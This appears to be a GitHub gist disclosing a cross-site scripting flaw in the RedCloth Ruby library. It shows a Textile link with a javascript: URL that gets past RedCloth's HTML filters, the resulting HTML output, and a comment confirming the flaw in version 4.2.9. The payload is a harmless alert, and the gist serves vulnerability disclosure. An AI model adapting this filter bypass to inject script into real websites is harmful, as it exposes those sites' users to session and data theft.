Skip to content

Instantly share code, notes, and snippets.

Created Feb 29, 2012
What would you like to do?
require 'redcloth'
print'["clickme":javascript:alert%28/XSS/.source%29]', [:filter_html, :filter_styles, :filter_classes, :filter_ids]).to_html
# Result:
# <p><a href="javascript:alert%28/XSS/.source%29">clickme</a></p>

This comment has been minimized.

Copy link
Owner Author

@co3k co3k commented Feb 29, 2012

I've confirmed this with RedCloth-4.2.9 (installed by RubyGems).

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment